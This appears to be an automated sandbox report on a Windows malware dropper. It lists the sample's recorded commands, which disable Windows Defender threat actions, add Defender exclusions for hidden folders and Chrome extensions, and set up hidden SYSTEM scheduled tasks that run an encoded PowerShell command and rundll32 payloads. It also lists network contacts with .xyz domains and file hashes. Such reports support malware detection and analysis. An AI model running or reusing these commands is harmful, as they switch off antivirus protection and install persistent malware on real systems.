"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AClHKqYMJaBBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AClHKqYMJaBBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RFIumDCEBXXU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RFIumDCEBXXU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ijLlchIpU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ijLlchIpU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vEcQBTYFTXUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vEcQBTYFTXUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\oBeyQrPqBvPiiLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\oBeyQrPqBvPiiLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gLbKcqvTyliDAKYm\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gLbKcqvTyliDAKYm\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\oBeyQrPqBvPiiLVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\oBeyQrPqBvPiiLVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gLbKcqvTyliDAKYm /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gLbKcqvTyliDAKYm /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXgakJwua" /SC once /ST 08:13:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gXgakJwua"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gXgakJwua"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GSDaywQPJdyrKXMOz" /SC once /ST 12:56:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe\" Y4 /qmBUdidaH 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GSDaywQPJdyrKXMOz"

C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe

C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe Y4 /qmBUdidaH 525403 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 812

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bGTnZQDECKwDuNSWyq"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ijLlchIpU\LnuMgT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "erLaEdTsgGebTau" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "erLaEdTsgGebTau2" /F /xml "C:\Program Files (x86)\ijLlchIpU\kjnuipy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "erLaEdTsgGebTau"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "erLaEdTsgGebTau"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "JUjxRHGCKYRete" /F /xml "C:\Program Files (x86)\RFIumDCEBXXU2\LFylShE.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dHStwJHTntsRr2" /F /xml "C:\ProgramData\oBeyQrPqBvPiiLVB\FDZpIlg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FaHXLaniQBMEYVQSg2" /F /xml "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\vzWnlIa.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "AHXMxnWaJXPmSiNckSN2" /F /xml "C:\Program Files (x86)\AClHKqYMJaBBC\atrxmZN.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "hijxFSKlICFAhziPp" /SC once /ST 08:11:36 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gLbKcqvTyliDAKYm\UfvEZzvn\zxDgfHZ.dll\",#1 /jIdidT 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "hijxFSKlICFAhziPp"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\gLbKcqvTyliDAKYm\UfvEZzvn\zxDgfHZ.dll",#1 /jIdidT 525403

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\gLbKcqvTyliDAKYm\UfvEZzvn\zxDgfHZ.dll",#1 /jIdidT 525403

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "GSDaywQPJdyrKXMOz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 2024

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "hijxFSKlICFAhziPp"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 32.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 10.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 api5.check-data.xyz udp
US 34.217.172.173:80 api5.check-data.xyz tcp
US 8.8.8.8:53 50.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 173.172.217.34.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS757E.tmp\Install.exe

MD5 fcbd9184c70b5ed860915cfccb13fa0d
SHA1 d14a7093faa2d201a8ecde506d766cda5f5d3920
SHA256 b49cee2ce140aeec1d685a83d9ca52893a23da49d7c4622b407834b856175952
SHA512 dd96794616542802c9da7d398eff286365766a16ad996edc867400d90e5f18a78574e67872def5e906e2be84fc4bd0f6d2ff6f7bbbc504ba668443d457ce0f15

C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe

MD5 b4ef95e882fde8174e2c403933235f37
SHA1 f12c45141684417134f4f233bfb988653a78ed68
SHA256 538e6f897d7e83021ee8271a1659cc2f0113fdcbd6597d59e36fe8ac7485c091
SHA512 dfd270d9b2ac20a35c049352c2d1c40c99893b64a756c26ec5b7a09ed51786bb010a2d79d00383d34ddb341104c6fd6d59200d395fdfb7f140321823c9d78883

memory/2736-14-0x00000000044E0000-0x0000000004516000-memory.dmp

memory/2736-15-0x00000000070D0000-0x00000000076F8000-memory.dmp

memory/2736-16-0x0000000006F00000-0x0000000006F22000-memory.dmp

memory/2736-17-0x0000000006FA0000-0x0000000007006000-memory.dmp

memory/2736-18-0x0000000007010000-0x0000000007076000-memory.dmp

memory/2736-19-0x0000000007990000-0x0000000007CE0000-memory.dmp

memory/2736-20-0x00000000077C0000-0x00000000077DC000-memory.dmp

memory/2736-21-0x0000000008020000-0x000000000806B000-memory.dmp

memory/2736-22-0x00000000080A0000-0x0000000008116000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dljn3sqo.xcn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2736-37-0x0000000009060000-0x00000000090F4000-memory.dmp

memory/2736-40-0x0000000009600000-0x0000000009AFE000-memory.dmp

memory/2736-39-0x0000000008E20000-0x0000000008E42000-memory.dmp

memory/2736-38-0x0000000008DD0000-0x0000000008DEA000-memory.dmp

memory/3152-41-0x0000000010000000-0x000000001328F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1 eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256 dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
